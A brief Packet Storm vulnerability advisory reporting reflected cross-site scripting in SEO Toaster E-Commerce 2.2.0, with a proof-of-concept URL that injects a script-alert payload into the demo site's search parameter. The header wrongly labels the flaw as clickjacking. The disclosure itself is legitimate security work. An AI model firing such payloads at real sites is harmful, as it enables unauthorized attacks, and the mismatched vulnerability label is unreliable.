SEO Toaster E-Commerce version 2.2.0 suffers from a cross site scripting vulnerability.
24bbaf5076666acb1c082a4015e52f5e8aa9a9c44a370c866f118c741c285a66# Affected software: http://demo.seotoaster.com
# Type of vulnerability: clickjacking
# Version: E-Commerce 2.2.0
# URL: http://www.seotoaster.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Description:Free SEO Software & CMS: All in One
# Proof of concept
seo toaster search filed was vuln to xss
http://demo.seotoaster.com/search-results.html?search=%3C%2Fscript%3E%3Cscript%3Ealert%28/provensec/%29%3C%2Fscript%3E
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed